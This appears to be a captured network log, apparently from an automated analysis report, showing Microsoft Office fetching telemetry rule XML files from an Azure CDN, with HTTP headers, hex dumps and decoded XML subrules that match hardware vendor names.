                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        33192.168.2.44978913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:00 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 8e1dc95e-801e-007b-6ed5-33e7ab000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153700Z-174f7845968t42glhC1EWRa36w00000004x0000000007wyk
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        34192.168.2.44978813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:00 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 95c6b661-501e-0078-17d5-3306cf000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153700Z-174f7845968jrjrxhC1EWRmmrs000000059000000000bxym
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        35192.168.2.44979013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:00 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 428
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5d78e2d9-801e-00a0-72d5-332196000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153700Z-174f7845968pf68xhC1EWRr4h800000005d0000000009t73
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        36192.168.2.44977513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:00 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: dc8e78b0-f01e-0085-35d5-3388ea000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153700Z-174f7845968c2t8dhC1EWR8s2000000004x0000000008m0b
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:00 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        37192.168.2.44979313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 602c134e-d01e-0049-04d5-33e7dc000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f78459685726chC1EWRsnbg000000055g00000000fnex
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        38192.168.2.44979113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1c99e56d-601e-0097-76d5-33f33a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f78459685m244hC1EWRgp2c000000052g00000000037g
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        39192.168.2.44979213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                        x-ms-request-id: f5f8c6aa-e01e-0099-78d5-33da8a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f7845968xlwnmhC1EWR0sv800000004v000000000s889
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        40192.168.2.44979413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5fec14be-a01e-0021-75d5-33814c000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153701Z-174f7845968v79b7hC1EWRu01s00000004sg00000000c2yg
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        41192.168.2.44978713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5f09de9a-701e-0050-70d5-336767000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
